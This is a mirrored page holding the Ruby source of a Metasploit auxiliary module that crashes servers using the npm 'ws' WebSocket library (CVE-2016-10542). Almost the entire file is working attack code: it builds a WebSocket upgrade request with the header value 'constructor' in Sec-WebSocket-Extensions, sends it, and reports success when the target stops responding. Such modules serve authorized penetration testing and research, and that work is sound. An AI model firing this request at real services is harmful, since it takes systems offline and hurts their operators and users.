Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/ws_dos.rb
31189 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize

11
    super(

12
      'Name' => 'ws - Denial of Service',

13
      'Description' => %q{

14
          This module exploits a Denial of Service vulnerability in npm module "ws".

15
        By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.

16
      },

17
      'References' => [

18
        ['CVE', '2016-10542'],

19
        ['URL', 'https://nodesecurity.io/advisories/550'],

20
        ['CWE', '400'],

21
      ],

22
      'Author' => [

23
        'Ryan Knell,  Sonatype Security Research',

24
        'Nick Starke, Sonatype Security Research',

25
      ],

26
      'License' => MSF_LICENSE,

27
      'Notes' => {

28
        'Stability' => [CRASH_SERVICE_DOWN],

29
        'SideEffects' => [],

30
        'Reliability' => []

31
      }

32
    )

33


34
    register_options([

35
      Opt::RPORT(3000),

36
      OptString.new('TARGETURI', [true, 'The base path', '/']),

37
    ])

38
  end

39


40
  def run

41
    path = datastore['TARGETURI']

42


43
    # Create HTTP request

44
    req = [

45
      "GET #{path} HTTP/1.1",

46
      'Connection: Upgrade',

47
      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(5..14)}",

48
      'Sec-WebSocket-Version: 8',

49
      'Sec-WebSocket-Extensions: constructor', # Adding "constructor" as the value for this header causes the DoS

50
      'Upgrade: websocket',

51
      "\r\n"

52
    ].join("\r\n")

53


54
    begin

55
      connect

56
      print_status("Sending DoS packet to #{peer}")

57
      sock.put(req)

58


59
      data = sock.get_once(-1) # Attempt to retrieve data from the socket

60


61
      if data =~ /101/ # This is the expected HTTP status code. IF it's present, we have a valid upgrade response.

62
        print_error('WebSocket Upgrade request Successful, service not vulnerable.')

63
      else

64
        fail_with(Failure::Unknown, 'An unknown error occurred')

65
      end

66


67
      disconnect

68
      print_error('DoS packet unsuccessful')

69
    rescue ::Rex::ConnectionRefused

70
      print_error("Unable to connect to #{peer}")

71
    rescue ::Errno::ECONNRESET, ::EOFError

72
      print_good("DoS packet successful. #{peer} not responding.")

73
    end

74
  end

75
end

76


77